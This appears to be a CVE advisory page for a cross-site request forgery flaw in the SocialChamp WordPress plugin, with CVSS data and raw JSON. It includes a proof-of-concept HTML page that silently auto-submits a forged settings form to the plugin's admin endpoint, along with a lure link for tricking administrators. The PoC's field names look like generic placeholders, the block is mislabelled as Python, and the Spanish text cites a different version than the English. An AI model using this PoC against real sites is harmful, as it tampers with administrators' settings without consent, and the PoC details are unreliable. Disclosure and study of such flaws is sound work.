Security Vulnerability Report
中文
CVE-2025-14846 CVSS 4.3 MEDIUM

CVE-2025-14846

Published: 2026-01-14 07:16:14
Last Modified: 2026-04-15 00:35:42

Description

The SocialChamp with WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.5. This is due to missing nonce validation on the wpsc_settings_tab_menu function. This makes it possible for unauthenticated attackers to modify plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SocialChamp WordPress Plugin <= 1.3.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-14846 --> <!-- This PoC demonstrates how an attacker can forge a request to modify SocialChamp settings --> <!DOCTYPE html> <html> <head> <title>CSRF PoC - CVE-2025-14846</title> </head> <body> <h1>SocialChamp CSRF Vulnerability PoC</h1> <p>If the admin clicks the button below, plugin settings will be modified.</p> <!-- Auto-submit form targeting the vulnerable endpoint --> <form id="csrfForm" action="[TARGET_SITE]/wp-admin/admin.php?page=wp-socialchamp-settings" method="POST" style="display:none;"> <!-- Forged parameters to modify plugin settings --> <input type="hidden" name="wpsc_settings_tab_menu" value="1"> <input type="hidden" name="setting_name" value="malicious_setting_value"> <input type="hidden" name="action" value="save_settings"> <!-- Additional forged parameters based on target settings --> </form> <script> // Auto-submit the forged request when page loads document.getElementById('csrfForm').submit(); </script> <p>Alternatively, use this link in social engineering attacks:</p> <a href="[MALICIOUS_PAGE_WITH_FORM]" target="_blank">Click here for amazing offer!</a> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14846", "sourceIdentifier": "[email protected]", "published": "2026-01-14T07:16:13.680", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The SocialChamp with WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.5. This is due to missing nonce validation on the wpsc_settings_tab_menu function. This makes it possible for unauthenticated attackers to modify plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}, {"lang": "es", "value": "El plugin SocialChamp with WordPress para WordPress es vulnerable a la falsificación de petición en sitios cruzados en todas las versiones hasta la 1.3.3, inclusive. Esto se debe a la falta de validación de nonce en la función wpsc_settings_tab_menu. Esto hace posible que atacantes no autenticados modifiquen la configuración del plugin a través de una petición falsificada, siempre que puedan engañar a un administrador del sitio para que realice una acción como hacer clic en un enlace."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/auto-post-to-social-media-wp-to-social-champ/tags/1.3.3/admin/class-wp-socialchamp-settings-init.php#L157", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3467359/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bdbb660b-19aa-4c68-865c-0a51b85d1e5a?source=cve", "source": "[email protected]"}]}}